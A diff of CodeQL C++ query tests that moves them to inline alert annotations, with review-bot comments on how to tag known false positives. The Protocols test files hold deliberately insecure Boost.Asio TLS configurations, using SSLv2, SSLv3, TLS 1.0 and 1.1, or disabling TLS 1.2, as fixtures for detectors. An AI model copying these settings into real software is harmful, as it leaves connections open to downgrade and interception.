--- a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref @@ -1 +1,2 @@ -Likely Bugs/OO/NonVirtualDestructorInBaseClass.ql +query: Likely Bugs/OO/NonVirtualDestructorInBaseClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref index 2b0862fc362d..eee2e41916cd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref @@ -1 +1,2 @@ -Likely Bugs/OO/ThrowInDestructor.ql +query: Likely Bugs/OO/ThrowInDestructor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp index 247d6d801efd..0574cc47facd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp @@ -10,7 +10,7 @@ struct ThrowsDirectly { ~ThrowsDirectly() noexcept(false) { if (i == 0) { - throw exception(); // BAD + throw exception(); // BAD // $ Alert } else if (i == 1) { try { @@ -45,14 +45,14 @@ struct ThrowsDirectly { } else if (i == 5) { try { if (i == 5) - throw exception(); // BAD + throw exception(); // BAD // $ Alert } catch (const specific_exception &) { } } else if (i == 6) { try { if (i == 6) - throw exception(); // BAD + throw exception(); // BAD // $ Alert } catch (const other_throwable &) { } } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref b/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref
index 8c1c54ff9606..bc1be3c9bfb6 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref
@@ -1 +1,2 @@
-Likely Bugs/Protocols/TlsSettingsMisconfiguration.ql
\ No newline at end of file
+query: Likely Bugs/Protocols/TlsSettingsMisconfiguration.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref b/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref
index 2cef090faef4..b682f4aa2d55 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref
@@ -1 +1,2 @@
-Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.ql
\ No newline at end of file
+query: Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp
index 5c2c2d6e3574..f9b0f05b091f 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp
+++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp
@@ -22,23 +22,23 @@ void TestProperConfiguration_inter_CorrectUsage02() void TestProperConfiguration_inter_IncorrectUsage01() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD - missing disable SSLv3 + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD - missing disable SSLv3 // $ Alert[cpp/boost/tls-settings-misconfiguration] SetOptionsNoOldTls(ctx); } void TestProperConfiguration_IncorrectUsage01() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD // $ Alert[cpp/boost/tls-settings-misconfiguration] } void TestProperConfiguration_IncorrectUsage02() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD + boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD // $ Alert[cpp/boost/tls-settings-misconfiguration] } void TestProperConfiguration_IncorrectUsage03() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD + boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD // $ Alert[cpp/boost/tls-settings-misconfiguration] SetOptionsNoOldTls(ctx); ctx.set_options(boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_2 ); // BUG - disabling TLS 1.2 
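Review bot: In `TestProperConfiguration_IncorrectUsage03` the `set_options(... no_tlsv1 | no_tlsv1_2); // BUG - disabling TLS 1.2` line gets no tag, while the only `$ Alert[cpp/boost/tls-settings-misconfiguration]` sits on the `ctx` declaration above it. If the query reports the TLS 1.2 finding at the declaration as well, that single tag stands for two distinct findings and the inline check alone would not notice one of them disappearing. A comment on the BUG line would make the intent explicit, for example `// BUG - disabling TLS 1.2 (reported at the ctx declaration above)`, once the reporting location is confirmed against the `.expected` output.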
@@ -47,21 +47,21 @@ void TestProperConfiguration_IncorrectUsage03() void TestHardcodedProtocols() { //////////////////////// Banned Hardcoded algorithms - boost::asio::ssl::context cxt_sslv2(boost::asio::ssl::context::sslv2); // BUG - boost::asio::ssl::context cxt_sslv2c(boost::asio::ssl::context::sslv2_client); // BUG - boost::asio::ssl::context cxt_sslv2s(boost::asio::ssl::context::sslv2_server); // BUG + boost::asio::ssl::context cxt_sslv2(boost::asio::ssl::context::sslv2); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv2c(boost::asio::ssl::context::sslv2_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv2s(boost::asio::ssl::context::sslv2_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] - boost::asio::ssl::context cxt_sslv3(boost::asio::ssl::context::sslv3); // BUG - boost::asio::ssl::context cxt_sslv3c(boost::asio::ssl::context::sslv3_client); // BUG - boost::asio::ssl::context cxt_sslv3s(boost::asio::ssl::context::sslv3_server); // BUG + boost::asio::ssl::context cxt_sslv3(boost::asio::ssl::context::sslv3); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv3c(boost::asio::ssl::context::sslv3_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv3s(boost::asio::ssl::context::sslv3_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] - boost::asio::ssl::context cxt_tlsv1(boost::asio::ssl::context::tlsv1); // BUG - boost::asio::ssl::context cxt_tlsv1c(boost::asio::ssl::context::tlsv1_client); // BUG - boost::asio::ssl::context cxt_tlsv1s(boost::asio::ssl::context::tlsv1_server); // BUG + boost::asio::ssl::context cxt_tlsv1(boost::asio::ssl::context::tlsv1); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + 
boost::asio::ssl::context cxt_tlsv1c(boost::asio::ssl::context::tlsv1_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_tlsv1s(boost::asio::ssl::context::tlsv1_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] - boost::asio::ssl::context cxt_tlsv11(boost::asio::ssl::context::tlsv11); // BUG - boost::asio::ssl::context cxt_tlsv11c(boost::asio::ssl::context::tlsv11_client); // BUG - boost::asio::ssl::context cxt_tlsv11s(boost::asio::ssl::context::tlsv11_server); // BUG + boost::asio::ssl::context cxt_tlsv11(boost::asio::ssl::context::tlsv11); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_tlsv11c(boost::asio::ssl::context::tlsv11_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_tlsv11s(boost::asio::ssl::context::tlsv11_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] ////////////////////// Hardcoded algorithms @@ -76,7 +76,7 @@ void TestHardcodedProtocols() void InterProceduralTest(boost::asio::ssl::context::method m) { - boost::asio::ssl::context cxt1(m); // BUG - Multiple hits (sink) + boost::asio::ssl::context cxt1(m); // BUG - Multiple hits (sink) // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] } void TestHardcodedProtocols_inter() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp index 5679cee8b0f8..c7715ff24614 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp 
@@ -12,7 +12,7 @@ void bad1() { // BAD: missing disable SSLv3 boost::asio::ssl::context::method m = boost::asio::ssl::context::sslv23; - boost::asio::ssl::context ctx(m); + boost::asio::ssl::context ctx(m); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1); } @@ -20,7 +20,7 @@ void good2() { // GOOD [FALSE POSITIVE x 3] boost::asio::ssl::context::options opts = boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1 | boost::asio::ssl::context::no_sslv3; - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(opts); } @@ -28,7 +28,7 @@ void bad2() { // BAD: missing disable SSLv3 [WITH FALSE POSITIVE x 2] boost::asio::ssl::context::options opts = boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1; - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(opts); } @@ -42,14 +42,14 @@ void good3() void bad3() { // BAD: missing disable SSLv3 - boost::asio::ssl::context *ctx = new boost::asio::ssl::context(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context *ctx = new boost::asio::ssl::context(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx->set_options(boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1); } void bad4() { // BAD: missing disable SSLv3 - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] } 
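Review bot: In `good2()` the new `// $ Alert[cpp/boost/tls-settings-misconfiguration]` tag marks as expected a result that the comment above calls `GOOD [FALSE POSITIVE x 3]`, so the inline tags no longer separate it from the true positives in `bad1()`, `bad3()` and `bad4()`. The inline-expectations syntax has a marker for a known false positive, `// $ SPURIOUS: Alert[cpp/boost/tls-settings-misconfiguration]`, which keeps the test passing while recording that the finding is unwanted. The same applies to the two `// FALSE POSITIVE // $ Alert` lines (`getAMYCHAR` and `ID(const char)`) in ReturnConstType/test.cpp, which would read `// $ SPURIOUS: Alert`.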
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp index c9932b31618d..88f204dcced9 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp @@ -4,7 +4,7 @@ void useTLS_bad() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); + boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(boost::asio::ssl::context::no_tlsv1); // BAD: missing no_tlsv1_1 // ... diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp index 2760dcb349c2..5c0ee7378dc7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp @@ -1,23 +1,23 @@ void test_simple_bad(int *p) { int x; - x = *p; - if (p == nullptr) { // BAD + x = *p; // $ Source + if (p == nullptr) { // BAD // $ Alert return; } } void test_not_same_basic_block(int *p) { - int x = *p; + int x = *p; // $ Source if (x > 100) return; - if (!p) // BAD + if (!p) // BAD // $ Alert return; } void test_indirect(int **p) { int x; - x = **p; - if (*p == nullptr) { // BAD + x = **p; // $ Source + if (*p == nullptr) { // BAD // $ Alert return; } } @@ -45,10 +45,10 @@ void test_no_single_dominator(int *p, bool b) { } int test_postdominator_same_bb(int *p) { - int b = (p == nullptr); // BAD + int b = (p == nullptr); // BAD // $ Alert // This dereference is a postdominator of the null check, meaning that all // paths from the check to the function exit will pass through it. - return *p + b; + return *p + b; // $ Source } int test_postdominator(int *p) { 
@@ -75,8 +75,8 @@ void test_indirect_local() { int *p = &a; int **pp = &p; int x; - x = **pp; - if (*pp == nullptr) { // BAD + x = **pp; // $ Source + if (*pp == nullptr) { // BAD // $ Alert return; } } @@ -89,8 +89,8 @@ void test_field_local(bool boolvar) { auto sp = &s; if (boolvar) { - int x = *sp->p; - if (sp->p == nullptr) { // BAD + int x = *sp->p; // $ Source + if (sp->p == nullptr) { // BAD // $ Alert return; } } else { diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected index 8ffb2330840e..997de4af41fd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected 
@@ -1,3 +1,21 @@ +#select +| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | +edges +| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... 
| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | +| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | nodes | RedundantNullCheckSimple.cpp:3:3:3:3 | VariableAddress: x | semmle.label | x | | RedundantNullCheckSimple.cpp:3:3:3:8 | Store: ... = ... | semmle.label | ... = ... | 
@@ -36,21 +54,3 @@ nodes | RedundantNullCheckSimple.cpp:93:9:93:10 | VariableAddress: sp | semmle.label | sp | | RedundantNullCheckSimple.cpp:93:13:93:13 | FieldAddress: p | semmle.label | p | | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | semmle.label | p | -edges -| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | -| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | -#select -| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... 
| the value is dereferenced | -| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref index 2223e47c30d2..169150bbd516 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref @@ -1 +1,2 @@ -Likely Bugs/RedundantNullCheckSimple.ql +query: Likely Bugs/RedundantNullCheckSimple.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref index ee515afb200f..bf5203dd1230 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref @@ -1 +1,2 @@ -Likely Bugs/ReturnConstType.ql +query: Likely Bugs/ReturnConstType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp index 77c82fbb54cb..a1d04f71a747 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp @@ -2,12 +2,12 @@ // --- examples from the qhelp --- // The leftmost const has no effect here. -const int square(const int x) { // BAD +const int square(const int x) { // BAD // $ Alert return x * x; } // The const has no effect here, and can easily be mistaken for const char*. -char* const id(char* s) { // BAD +char* const id(char* s) { // BAD // $ Alert return s; } @@ -15,9 +15,9 @@ char* const id(char* s) { // BAD const char *getAConstantString(); const char **getAConstantStringPointer(); -const char getAConstChar(); // BAD -const signed char getASignedConstChar(); // BAD -unsigned const char getAnUnsignedConstChar(); // BAD +const char getAConstChar(); // BAD // $ Alert +const signed char getASignedConstChar(); // BAD // $ Alert +unsigned const char getAnUnsignedConstChar(); // BAD // $ Alert char getAChar(); typedef const char mychar; 
@@ -43,10 +43,10 @@ template class myWrapper { myWrapper testTemplateClass{t: 'a'}; #define MYCHAR const char -MYCHAR getAMYCHAR(); // FALSE POSITIVE +MYCHAR getAMYCHAR(); // FALSE POSITIVE // $ Alert #define ID(T) T id_ (T x) {return x;} -ID(const char); // FALSE POSITIVE +ID(const char); // FALSE POSITIVE // $ Alert const float pi = 3.14159626f; const float &getPiRef() { return pi; } // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref index 052b0cd2ad50..3dbe1d19bf1e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref @@ -1 +1,2 @@ -Likely Bugs/ReturnConstTypeMember.ql +query: Likely Bugs/ReturnConstTypeMember.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp index 73d18c844d23..c36e5e9625eb 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp @@ -10,7 +10,7 @@ class TC1 { template class TC2 { public: - T fun() const { + T fun() const { // $ Alert return 5; } }; diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp index e568d0da1525..e8eb23d013e1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp 
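Review bot: In `ReturnConstType/test.cpp`, the two declarations that the file itself labels `FALSE POSITIVE` (`MYCHAR getAMYCHAR();` and `ID(const char);`) are annotated with a plain `// $ Alert`. That records the false positive as the intended result, the same as the `BAD` cases in the earlier hunk. If the goal is to track them as known false positives, the inline-expectations marker for that is `// $ SPURIOUS: Alert`, for example `MYCHAR getAMYCHAR(); // FALSE POSITIVE // $ SPURIOUS: Alert`. A later precision fix in the query would then be visible as an improvement, and a reader would not mistake these for true results.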
@@ -2,13 +2,13 @@ class myClass { int getAnInt() { return 0; } - const int getAConstInt() { + const int getAConstInt() { // $ Alert return 0; } int getAnIntConst() const { return 0; } - const int getAConstIntConst() const { + const int getAConstIntConst() const { // $ Alert return 0; } @@ -16,7 +16,7 @@ class myClass { return 0; } - static const int getAStaticConstInt() { + static const int getAStaticConstInt() { // $ Alert return 0; } }; diff --git a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp index 7dd7855bacc5..65e41093c190 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp @@ -3,7 +3,7 @@ void test1() { - int i, j, outer_loop_var, inner_loop_var; + int i, j, outer_loop_var, inner_loop_var; // $ Alert for (i = 0; i < 10; i++) // GOOD: no nested loop { @@ -27,7 +27,7 @@ void test1() void test2(char *str) { - for (char *a = str; *a != NULL; a++) // BAD: short name + for (char *a = str; *a != NULL; a++) // BAD: short name // $ Alert { char *b = a; // GOOD: not a loop variable @@ -70,7 +70,7 @@ void test3() } } - for (int y = 0; y < 256; y++) // BAD: x and y are not a co-ordinate pair + for (int y = 0; y < 256; y++) // BAD: x and y are not a co-ordinate pair // $ Alert { for (int x = 0; x < 256; x++) { @@ -93,7 +93,7 @@ void test3() { string strings[10]; - for (int i = 0; i < 10; i++) // BAD: x and y are not a co-ordinate pair + for (int i = 0; i < 10; i++) // BAD: x and y are not a co-ordinate pair // $ Alert { for (int j = 0; j < strings[i].strlen; j++) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref index 6e4b506018f8..de5c76f3f6a8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref 
+++ b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref
@@ -1 +1,2 @@
-Likely Bugs/ShortLoopVarName.ql
+query: Likely Bugs/ShortLoopVarName.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref
index 38492f2a203c..d96192c760c3 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref
@@ -1 +1,2 @@
-Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.ql
\ No newline at end of file
+query: Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref
index e61361d6bfee..56065d60fcee 100644
